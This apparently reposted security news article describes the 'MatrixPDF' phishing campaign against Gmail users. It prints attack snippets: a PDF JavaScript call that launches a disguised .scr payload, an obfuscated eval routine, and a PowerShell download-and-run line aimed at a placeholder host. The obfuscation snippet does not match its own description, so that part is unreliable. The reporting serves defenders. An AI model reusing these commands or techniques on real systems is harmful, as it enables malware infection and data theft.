In recent weeks, a novel malware campaign dubbed MatrixPDF has surfaced, targeting Gmail users with carefully crafted emails that slip past conventional spam and phishing filters.
This campaign has been active since mid-September 2025 and leverages PDF attachments that, when opened, initiate a stealthy infection chain designed to exfiltrate sensitive information and deliver additional payloads.
Early indicators suggest that attackers are exploiting trust in PDF documents by embedding obfuscated scripts and leveraging legitimate cloud hosting services to host malicious payloads, making detection significantly more challenging.
The initial wave of attacks delivered emails masquerading as internal organizational communications, complete with realistic headers and sender addresses spoofed to resemble trusted corporate domains.
Each email contains a PDF attachment named MatrixDoc.pdf, which appears harmless in preview. However, the PDF is crafted with malformed objects and an embedded JavaScript action that automatically executes when the document is opened in compatible viewers.
Researchers noted that the JavaScript code employs customized obfuscation techniques, including string concatenation and nonstandard encoding schemes, to evade static analysis.
Varonis analysts identified the MatrixPDF campaign after observing unusual PDF parsing errors across several high-profile enterprise networks.
.webp)
Examination of the malicious documents revealed that the embedded script uses the util.printf() function to dynamically reconstruct and execute a PowerShell command.
By chaining multiple decoding routines, the malware ultimately invokes:-
this.exportDataObject({cName: "payload.scr", nLaunch: 2});triggering the execution of a secondary executable disguised as a screensaver file. The PowerShell payload then reaches out to a cloud storage bucket to download additional modules, establishing command-and-control communications.
Further analysis exposed that once the secondary payload is active, it registers a persistence mechanism by creating a hidden scheduled task named MatrixUpdater.
This task runs every hour, ensuring that the malware can update itself or fetch new instructions without user intervention. Detection evasion is enhanced through intermittent network connections and randomized task names that change with each infection.
Infection Mechanism
Delving into the infection mechanism, MatrixPDF begins with PDF JavaScript exploiting the exportDataObject API to extract and launch the malicious .scr file.
.webp)
The embedded script reconstructs a Base64-encoded PowerShell command by piecing together multiple string fragments. A representative snippet is shown below:-
var part1 = "ZXh0cmFjdC5GaWxl";
var part2 = "LmQ=";
var combined = util.stringFromStream(util.createStream({
cData: part1 + part2
}));
eval(combined);This obfuscation technique ensures that signature-based defenses struggle to flag the script. Once decoded, the command executes:-
IEX (New-Object Net.WebClient).DownloadString('https://cloudhost.example.com/update.ps1')which retrieves and runs a PowerShell script responsible for deploying the main payload. The script also leverages the Windows Management Instrumentation (WMI) service to check for existing infections, preventing duplicate installations.
Upon successful download, the PowerShell script writes the payload to %APPDATA%LocalMatrixmatrix.exe and configures a hidden scheduled task for persistence.
Through its layered approach, MatrixPDF demonstrates a sophisticated blend of social engineering, scripting abuse, and legitimate hosting infrastructure to compromise Gmail users while maintaining a low forensic footprint.
Continuous monitoring and heuristic-based PDF analysis are essential to detect and mitigate this emerging threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
